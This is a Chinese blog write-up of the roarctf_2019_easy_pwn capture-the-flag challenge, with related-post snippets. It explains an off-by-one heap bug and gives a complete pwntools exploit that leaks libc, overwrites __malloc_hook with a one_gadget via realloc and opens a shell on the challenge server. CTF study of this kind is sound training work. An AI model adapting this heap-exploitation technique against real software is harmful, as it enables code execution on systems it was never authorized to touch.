roarctf_2019_easy_pwn

最新推荐文章于 2024-02-03 02:09:42 发布
最新推荐文章于 2024-02-03 02:09:42 发布
阅读量561 收藏 1
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122122121
版权

roarctf_2019_easy_pwn

查看保护
请添加图片描述
请添加图片描述
这里有一个off-by-one
请添加图片描述
a2比a1大10就会有一个溢出。overlapping+fastbin attack即可getshell。发现one_gadget打不通,用realloc来调整栈即可打通
具体的overlapping + fastbin attack看z1r0’s blog吧。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26707)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'choice: '

def add(size):
    r.sendlineafter(menu, '1')
    r.sendlineafter('size: ', str(size))

def edit(index, size, content):
    r.sendlineafter(menu, '2')
    r.sendlineafter('index: ', str(index))
    r.sendlineafter('size: ', str(size))
    r.sendlineafter('content: ', content)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('index: ', str(index))

def show(index):
    r.sendlineafter(menu, '4')
    r.sendlineafter('index: ', str(index))

add(0x18)   #0
add(0x10)   #1
add(0x60)   #2
add(0x10)   #3

p1 = b'a' * 0x18 + p8(0x91)
edit(0, 34, p1)

delete(1)

add(0x10)   #1
show(2)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

libc = ELF('libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base + libc.symbols['__libc_realloc']
success('realloc = ' + hex(realloc))
one = [0x45226, 0x4526a, 0xf03a4, 0xf1247]
one_gadget = one[1] + libc_base

add(0x60)   #4

delete(2)

p2 = p64(malloc_hook - 0x23)
edit(4, len(p2), p2)

add(0x60)
add(0x60)

p3 = b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc)
edit(5, len(p3), p3)

add(0x10)

r.interactive()
z1r0.
关注
专栏目录
pwnroarctf_2019_easy_pwn
Nothing
12-24 2111
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 803
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2354
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
pwnroarctf_2019_realloc_magic
Nothing
03-05 1032
例行检查 保护全开,分析程序逻辑。发现没有输出堆内容的函数,想要泄露libc地址只能通过修改IO_FILE结构体实现。realloc函数有两个trick。在size为0时,free掉指针指向的堆块,返回0;在分配超过当前指针指向堆块大小时如果有剩余空间则扩大堆块大小。 利用思路 1.堆块free 8次放进unsortbin中,在fd上得到arena地址,通过realloc扩大堆块的特性造成堆块堆叠...
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 2002
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 574
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 293
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 355
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
roarctf_2019_easy_pwn 1/100
m0_57754423的博客
02-22 1509
edit chunk的功能里 存在off_by_one漏洞。 利用思路: 构造堆块重叠 然后house of sprit。 exp: from pwn import * p = process("./roarctf_2019_easy_pwn") e = ELF("./roarctf_2019_easy_pwn") libc = e.libc context.log_level = "debug" p.timeout = 0.1 def add(size): p.recvuntil("./ch
linux_pwn(3)--Chunk Extend and Overlapping&&roarctf_2019_easy_pwn
azraelxuemo的博客
03-07 3613
文章目录What is Chunk Extend and Overlappingpwn题思路例题保护机制add函数show函数delete函数edit函数开始做题准备框架调试覆盖后面一个块的大小释放堆块free验证机制尝试修改堆块开始泄露libc任意地址写总结 What is Chunk Extend and Overlapping Chunk Extend and Overlapping就是当我们可以控制chunk的header时候,通过修改原有块的头大小,产生堆块重叠 比如说原来的两个堆块都是0x21
[BUUCTF]-PWN:roarctf_2019_easy_pwn解析
最新发布
2301_79326813的博客
02-03 1495
先看保护64位,got表不可写看ida大致就是alloc创建堆块,fill填充堆块,free释放堆块,show输出堆块内容这里要注意的点有以下alloc创建堆块:这里采用的是calloc而不是malloc,calloc在创建堆块时会初始化也就是清空相应的内存空间,而malloc不会,这里使用calloc创建堆块fill填充堆块:这里它限制了填充的字节大小不得超过堆块大小,但如果填充大小正好大于堆块10字节的话,就可以多溢出一个字节,存在off by one漏洞。
BUUCTFroarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1131
BUUCTFroarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
buuoj刷题记录 - roarctf_2019_easy_pwn
qq_34010404的博客
03-17 218
检查一下保护: 拖进IDA分析程序: 问题处在write函数中, 最后可以溢出一个字节. 思路:溢出一个字节覆盖下一个chunk的prev in use标记位.然后向前合并,构造重叠chunk。 下面是我的构造方法: create三个这样的chunk free掉0 ,然后利用chunk1 覆盖掉chunk2的prev in use 标记位.同时在chunk1内布置好prev size.(glibc-2.23不会通过prev size 找到chunk ,然后比较前一个chunk的size,所以
PWN刷题】Pwnable-calc、Buu-roarctf_2019_easyrop
QYbudong的博客
05-06 1529
今天事略多,做一道pwnable+一道有分的buu吧一、Buu-roarctf_2019_easyrop。
buuctf_roarctf_2019_easyheap离谱的一题
qq_43766802的博客
09-29 667
首先例行公事,用checksec检查一下函数的保护措施,发现除了pie保护全开,但此题不需要泄漏程序加载地址,是个好事 查看一下函数逻辑,程序一开始我们可以向内存区域的某一块输入数据,接下来就是heap的经典菜单栏,add函数允许我们创建任意大小的buf,但只有一个指针,free时没有删除指针,可以double free,当我们输入666时程序允许我们添加和free一个大小固定的chunk给ptr,这个ptr其实没什么用,主要用来给自定义大小的buf double free做道具用,show函数只有当
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值